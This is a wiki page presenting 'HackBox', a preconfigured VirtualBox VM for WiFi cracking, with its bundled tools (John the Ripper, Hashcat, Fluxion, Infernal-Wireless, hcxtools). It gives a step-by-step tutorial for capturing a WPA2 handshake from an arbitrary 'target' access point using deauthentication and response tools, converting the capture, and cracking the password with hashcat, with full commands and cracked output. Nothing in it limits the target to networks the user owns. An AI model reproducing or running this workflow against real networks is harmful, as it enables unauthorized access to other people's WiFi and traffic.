User Tools

Site Tools


wiki:hackbox

EHVSN HackBox v1

Introduction

This is a VirtualBox VM that has been optimized for WiFi cracking. The HackBox is also capable of doing more than just that ;-) but in this release we focus on WiFi hacking. This VirtualBox image will give you a better resolution and bi-directional clipboard sharing support thanks to pre-installed vm-additions. These vastly enhance your virtualbox experience! However, in order to use this for WiFi cracking, we do require a USB adapter, with monitor mode. This box features tools like Fluxion and Infernal-Wireless, but also allows you to manually hack WiFi networks as described in the tutorial on this page. For tutorials regarding Fluxion/I-W I refer to YouTube or other sources as there are many good ones out there already.

Logins:
user: ethicalhacker
pass: [email protected]!
user: root
pass: [email protected]!

The VirtualBox comes pre-installed with a lot of essentials that also are used in different cracking/hacking procedures and is thereby a nice base for anyone to expand on:

virtualbox-additions
libboost-all-dev
libpam-dev
libbz2-dev
rexgen
RTL8812AU/21AU and RTL8814AU driver with monitor mode and frame injection

JohnTheRipper Jumbo

This image comes with JohnTheRipper v1.8.0.11-jumbo-1-bleeding, there's John the Ripper and there's John the Ripper Pro , Pro adds support for Windows NTLM (MD4-based) and Mac OS X 10.4+ salted SHA-1 hashes. This “Community enhanced” / jumbo version, adds support for many more password hash types, including:

Windows NTLM (MD4-based),
Mac OS X 10.4-10.6 salted SHA-1 hashes,
Mac OS X 10.7 salted SHA-512 hashes,
raw MD5 and SHA-1,
arbitrary MD5-based “web application” password hash types,
hashes used by SQL database servers (MySQL, MS SQL, Oracle) and by some LDAP servers,
several hash types used on OpenVMS, password hashes of the Eggdrop IRC bot,
and lots of other hash types,
as well as many non-hashes such as OpenSSH private keys, S/Key skeykeys files, Kerberos TGTs, PDF files, ZIP (classic PKZIP and WinZip/AES) and RAR archives.

To start JTR:
1. navigate to home/ethicalhacker/JohnTheRipper-bleeding-jumbo/run/
2. ./john (alternatively “PATH=$PWD:$PATH” to include this directory so it's accessible from any path)

Hashcat

World's best and most powerful password cracker.

MD4 MD5 Half MD5 (left, mid, right) SHA1 SHA-224 SHA-256 SHA-384 SHA-512 SHA-3 (Keccak) BLAKE2b-512 SipHash Skip32 RIPEMD-160 Whirlpool DES (PT = $salt, key = $pass) 3DES (PT = $salt, key = $pass) ChaCha20 GOST R 34.11-94 GOST R 34.11-2012 (Streebog) 256-bit GOST R 34.11-2012 (Streebog) 512-bit md5($pass.$salt) md5($salt.$pass) md5(unicode($pass).$salt) md5($salt.unicode($pass)) md5($salt.$pass.$salt) md5($salt.md5($pass)) md5($salt.md5($salt.$pass)) md5($salt.md5($pass.$salt)) md5(md5($pass)) md5(md5($pass).md5($salt)) md5(strtoupper(md5($pass))) md5(sha1($pass)) sha1($pass.$salt) sha1($salt.$pass) sha1(unicode($pass).$salt) sha1($salt.unicode($pass)) sha1(sha1($pass)) sha1($salt.sha1($pass)) sha1(md5($pass)) sha1($salt.$pass.$salt) sha1(CX) sha256($pass.$salt) sha256($salt.$pass) sha256(unicode($pass).$salt) sha256($salt.unicode($pass)) sha512($pass.$salt) sha512($salt.$pass) sha512(unicode($pass).$salt) sha512($salt.unicode($pass)) HMAC-MD5 (key = $pass) HMAC-MD5 (key = $salt) HMAC-SHA1 (key = $pass) HMAC-SHA1 (key = $salt) HMAC-SHA256 (key = $pass) HMAC-SHA256 (key = $salt) HMAC-SHA512 (key = $pass) HMAC-SHA512 (key = $salt) PBKDF2-HMAC-MD5 PBKDF2-HMAC-SHA1 PBKDF2-HMAC-SHA256 PBKDF2-HMAC-SHA512 MyBB phpBB3 SMF (Simple Machines Forum) vBulletin IPB (Invision Power Board) WBB (Woltlab Burning Board) osCommerce xt:Commerce PrestaShop MediaWiki B type WordPress Drupal 7 Joomla PHPS Django (SHA-1) Django (PBKDF2-SHA256) Episerver ColdFusion 10+ Apache MD5-APR MySQL PostgreSQL MSSQL Oracle H: Type (Oracle 7+) Oracle S: Type (Oracle 11+) Oracle T: Type (Oracle 12+) Sybase hMailServer DNSSEC (NSEC3) IKE-PSK IPMI2 RAKP iSCSI CHAP CRAM-MD5 MySQL CRAM (SHA1) PostgreSQL CRAM (MD5) SIP digest authentication (MD5) WPA/WPA2 WPA/WPA2 PMK NetNTLMv1 NetNTLMv1+ESS NetNTLMv2 Kerberos 5 AS-REQ Pre-Auth etype 23 Kerberos 5 TGS-REP etype 23 Netscape LDAP SHA/SSHA FileZilla Server LM NTLM Domain Cached Credentials (DCC), MS Cache Domain Cached Credentials 2 (DCC2), MS Cache 2 DPAPI masterkey file v1 and v2 MS-AzureSync PBKDF2-HMAC-SHA256 descrypt bsdicrypt md5crypt sha256crypt sha512crypt bcrypt scrypt macOS v10.4 macOS v10.5 macOS v10.6 macOS v10.7 macOS v10.8 macOS v10.9 macOS v10.10 iTunes backup < 10.0 iTunes backup >= 10.0 AIX {smd5} AIX {ssha1} AIX {ssha256} AIX {ssha512} Cisco-ASA MD5 Cisco-PIX MD5 Cisco-IOS $1$ (MD5) Cisco-IOS type 4 (SHA256) Cisco $8$ (PBKDF2-SHA256) Cisco $9$ (scrypt) Juniper IVE Juniper NetScreen/SSG (ScreenOS) Juniper/NetBSD sha1crypt Fortigate (FortiOS) Samsung Android Password/PIN Windows Phone 8+ PIN/password GRUB 2 CRC32 RACF Radmin2 Redmine PunBB OpenCart Atlassian (PBKDF2-HMAC-SHA1) Citrix NetScaler SAP CODVN B (BCODE) SAP CODVN F/G (PASSCODE) SAP CODVN H (PWDSALTEDHASH) iSSHA-1 PeopleSoft PeopleSoft PS_TOKEN Skype WinZip 7-Zip RAR3-hp RAR5 AxCrypt AxCrypt in-memory SHA1 PDF 1.1 - 1.3 (Acrobat 2 - 4) PDF 1.4 - 1.6 (Acrobat 5 - 8) PDF 1.7 Level 3 (Acrobat 9) PDF 1.7 Level 8 (Acrobat 10 - 11) MS Office ⇐ 2003 MD5 MS Office ⇐ 2003 SHA1 MS Office 2007 MS Office 2010 MS Office 2013 Lotus Notes/Domino 5 Lotus Notes/Domino 6 Lotus Notes/Domino 8 Bitcoin/Litecoin wallet.dat Blockchain, My Wallet Blockchain, My Wallet, V2 1Password, agilekeychain 1Password, cloudkeychain LastPass Password Safe v2 Password Safe v3 KeePass 1 (AES/Twofish) and KeePass 2 (AES) JKS Java Key Store Private Keys (SHA1) Ethereum Wallet, PBKDF2-HMAC-SHA256 Ethereum Wallet, SCRYPT eCryptfs Android FDE ⇐ 4.3 Android FDE (Samsung DEK) TrueCrypt VeraCrypt LUKS Plaintext

Have a look at some great examples here: http://www.openwall.com/john/doc/EXAMPLES.shtml

Fluxion

Fluxion is the future of MITM WPA attacks, Fluxion is a remake of linset by vk496 with (hopefully) less bugs and more functionality. It's compatible with the latest release of Kali (rolling). The attack is mostly manual, but experimental versions will automatically handle most functionality from the stable releases.

To start it, fire up a terminal, navigate to /home/ethicalhacker/entropy1337-infernal-twin-622a679 and execute “./fluxion.sh”

Infernal-Wireless

This tool is created to aid the penetration testers in assessing wireless security.

Features:

GUI Wireless security assessment SUITE
Impelemented
WPA2 hacking
WEP Hacking
WPA2 Enterprise hacking
Wireless Social Engineering
SSL Strip
Report generation
PDF Report
HTML Report
Note taking function
Data is saved into Database
Network mapping
MiTM
Probe Request

To run it:
1. Navigate to /home/ethicalhacker/entropy1337-infernal-twin-622a679/
2. “python Infernal-Twin.py”

HCXTOOLS

Small set of tools to capture and convert packets from wlan devices (h = hash, c = capture, convert and calculate candidates, x = different hashtypes) for the use with latest hashcat or John the Ripper. The tools are 100% compatible to hashcat and John the Ripper and recommended by hashcat. This branch is pretty closely synced to hashcat git branch (that means: latest hcxtools matching on latest hashcat beta) and John the Ripper git branch ( “bleeding-jumbo”).

Support for hashcat hash-modes: 2500, 2501, 4800, 5500, 12000, 16100

Support for John the Ripper hash-modes: WPAPSK-PMK, PBKDF2-HMAC-SHA1, chap, netntlm, tacacs-plus

After capturing, upload the “uncleaned” cap here (http://wpa-sec.stanev.org/?submit) to see if your ap or the client is vulnerable by using common wordlists. Convert the cap to hccapx and check if wlan-key or plainmasterkey was transmitted unencrypted.

wlandump-ng Small, fast and powerfull deauthentication/authentication/response tool
wlanrcascan Small, fast and simple passive WLAN channel assignment scanner (status output)
wlancapinfo Shows info of pcap file
wlancap2hcx Converts cap to hccapx and other formats (recommended for use with wlandump-ng)
wlanhcx2cap Converts hccapx to cap
wlanhc2hcx Converts hccap to hccapx
wlanwkp2hcx Converts wpk (ELMCOMSOFT EWSA projectfile) to hccapx
wlanhcx2essid Merges hccapx containing the same ESSID
wlanhcx2ssid Strips BSSID, ESSID, OUI
wlanhcxinfo Shows detailed info from contents of hccapxfile
wlanhcxmnc Help to calculate hashcat's nonce-error-corrections value on byte number xx of an anonce
wlanhashhcx Generate hashlist from hccapx hashfile (md5_64 hash:mac_ap:mac_sta:essid)
wlanhcxcat Simple password recovery tool for WPA/WPA2/WPA2 SHA256 AES-128-CMAC (hash-modes 2500, 2501)
wlanpmk2hcx Converts plainmasterkey and ESSID for use with hashcat hash-mode 12000 or john PBKDF2-HMAC-SHA1
wlanjohn2hcx Converts john wpapsk hashfiles for use with hashcat hash-modes 2500, 2501
wlancow2hcxpmk Converts pre-computed cowpatty hashfiles for use with hashcat hash-mode 2501
wlanhcx2john Converts hccapx to format expected by John the Ripper
wlanhcx2psk Calculates candidates for hashcat based on the hccapx file
wlancap2wpasec Upload multiple caps to http://wpa-sec.stanev.org
whoismac Show vendor information and/or download oui reference list

wlandump-ng is able to prevent complete wlan traffic
wlandump-ng is able to capture handshakes from not connected clients (only one single M2 from the client is required)
wlandump-ng is are able to capture handshakes from 5GHz clients on 2.4GHz (only one single M2 from the client is required)
wlandump-ng is able to capture extended EAPOL (RADIUS, GSM-SIM, WPS)
wlandump-ng is able to capture passwords from the wlan traffic
wlandump-ng is able to capture plainmasterkeys from the wlan traffic
wlandump-ng is able to capture usernames and identities from the wlan traffic

Basic WiFi command line instructions

List all networking interfaces:
$ifconfig -a

List wireless adapters:
$iwconfig

Find out if your WiFi adapter has monitor mode:
$iw list | grep monitor
No output: not supported. However, this doesn't always mean your device hasn't got monitor mode, you can search for another wifi driver that does support it in some cases.

Enable monitor mode using iwconfig (if supported):
$iwconfig wlan0 mode monitor

Test/start the device in monitor mode:
$airmon-ng start wlan0

Check if there are interfering processes:
$airmon-ng check

Kill all interfering processes:
$airmon-ng check kill

Using RFKill:
$rfkill unblock wifi
$rfkill unblock all

Display link quality
$iwconfig wlan0 | grep -i –color quality

Display OUT signal
$iwconfig wlan0 | grep -i –color signal

Show link quality on screen
normal: $cat /proc/net/wireless
auto-refresh: $watch -n 1 cat /proc/net/wireless

Tools to manage wlan through shell
-wavemon
-connmanctl

Connmanctl example usage:
connmanctl scan wifi
connmanctl services

An alternative to connmanctl is “wavemon” which is also included in this distro.

Tutorial #1: Setup your HackBox VirtualBox

1. After you downloaded this VBox image, import it into your VirtualBox installation as a 64-bit Debian Linux OS. Use the download disk image as hard drive image. If you don't have VirtualBox installed yet visit the download page here: https://www.virtualbox.org/wiki/Downloads

2. Install the “VirtualBox 5.2.2 Oracle VM VirtualBox Extension Pack” from the official site: https://www.virtualbox.org/wiki/Downloads , this VM is packed with the guest additions pre-installed! We need these extensions for full support.

3. We need to setup VirtualBox to use the USB WiFi dongle with a filter. Install your WiFi dongle in Windows, click “settings” from the HackBox-EHVSN in VirtualBox's main menu, click on “USB”, click on the green plus sign to add a new filter for a USB device, a new window pops up, select your WiFi adapter.

4. IMPORTANT, once your HackBox has booted, select the USB device from the connection menu by clicking it, then you need to PHYSICALLY DISCONNECT and CONNECT the USB adapters. See iwconfig or dmesg how the installation went of your new device. If it shows as wlan0, it should be fine!

Tutorial #2: Preparing your station for WiFi hacking

Before we start hacking WiFi, we need to have a monitor mode capable USB WiFi dongle.

1. Find out if your WiFi adapter has monitor mode:

$iw list | grep monitor

No output: not supported. However, this doesn't always mean your device hasn't got monitor mode, you can search for another wifi driver that does support it in some cases. In my case, I bought a RealTek 8812 USB WiFi and no suitable drivers were found. I used https://github.com/astsam/rtl8812au and compiled it, if you want to change the USB support, navigate in the shell to /home/ethicalhacker/rtl8812au-master/ and enter one of the models that this driver also supports:

make RTL8814=1
make RTL8812=1
make RTL8821=1

That's all what you need to do, a new driver will be installed automatically after compiling.

If you choose to use this driver, you can change the txpower and increase the signal strength of the adapter a little: “iwconfig wlan0 txpower 30” or “iw wlan0 set txpower fixed 3000”. If you want to try this on other drivers but don't see any improvement of the txpower value in the “iwconfig” output, most drivers always return a hardcoded value of 12 dBm. If the device keeps reporting 12 dBm while you've ran the commands to change the txpower value, it's just not supported.

2. Enable monitor mode using iwconfig (if supported):

$iwconfig wlan0 mode monitor

3. Test/start the device in monitor mode:

$airmon-ng start wlan0

If you experience problems starting the monitor mode, it can mean another process or service is locking the device.

1. Check if there are interfering processes:

$airmon-ng check

2. Kill all interfering processes:

$airmon-ng check kill

3. RFKill

$rfkill unblock wifi

Tutorial #3: Manually cracking a WiFi accesspoint

1. Acquiring a target

Choose a target, pick one where you expect to receive a lot of clients if possible, the more the better! We need traffic going on!
run wlandump-ng:
wlandump-ng -i <wlan0> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 512 -b -r -l -L -s 20

Hint: Don't capture from virtual adapters such as “mon0”

2. Analysis of the captured data

Alright, now we have data right? Let's analyse the .cap output file:

$ wlancapinfo -i test.cap
input file…….: test.cap
magic file number: 0xa1b2c3d4 (cap/pcap)
major version….: 2
minor version….: 4
data link type…: 105 (DLT_IEEE802_11) [http://www.tcpdump.org/linktypes.html]
packets inside…: 6
last pcap error..: flawless

3. Converting the .cap output file

Convert the .cap output file using wlancap2hcx, because there's information inside that other tools are not able to strip from it.

$ wlancap2hcx -o test.hccapx -e wordlist test.cap
start reading from test.cap
6 packets processed (6 wlan, 0 lan, 0 loopback)
found 1 wpa2 AES Cipher, HMAC-SHA1
found 1 valid wpa handshake (by wlandump-ng/wlanresponse)

You can see that there is a valid WPA2 handshake inside and that wlandump-ng/wlanresponse initiates the authentication with the client.
No access captured - there is no need to capture an accesspoint to get the data!
We use the -e option to save networknames and passwords to a file (it's a good idea to use this option everytime you run wlancap2hcx).

4. Handling a wordlist

In this example, we sort our wordlist and de-duplicate unneeded entries:
$ ls
test.hccapx test.cap wordlist
$ sort wordlist | uniq > wordlistsorted
there may be dupes inside the wordlist, we don't want to waste precious time!

5. Running Hashcat to crack the password

$ ls
test.hccapx test.cap wordlist wordlistsorted
$ hashcat -m 2500 –potfile-path=hc2500.pot test.hccapx wordlistsorted
hashcat (v3.6.0-247-g8f2cbb26) starting…
Session……….: hashcat
Status………..: Cracked
Hash.Type……..: WPA/WPA2
Hash.Target……: UPC501953949 (AP:8c:84:01:09:e9:e6 STA:bc:44:86:a1:66:82)
Guess.Base…….: File (wordlistsorted)
Guess.Queue……: 1/1 (100.00%)
Speed.Dev.#1…..: 0 H/s (0.36ms)
Recovered……..: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress………: 2/2 (100.00%)
Rejected………: 0/2 (0.00%)
Restore.Point….: 0/2 (0.00%)
Candidates.#1….: AXNDFNEU → UPC501953949
HWMon.Dev.#1…..: Temp: 42c Fan: 28% Util:100% Core:1303MHz Mem:3004MHz Bus:8

6. Take a look in the potfile:

fc9e1bbae495367adea6b452e410bd9b:8c840109e9e6:bc4486a16682:UPC501953949:AXNDFNEU

Congratulations, you have cracked the hash, using the captured password from wireless traffic!

FAQ

To get dir colors as root, execute:
alias ls='ls -la –color=auto'

Download

HackBox v1:
Debian 9.2.1 64-Bit VirtualBox HDD: HackBox-EHVSN-disk1.7z 1.2GB

wiki/hackbox.txt · Last modified: 2018/01/27 09:27 by stephan

Page Tools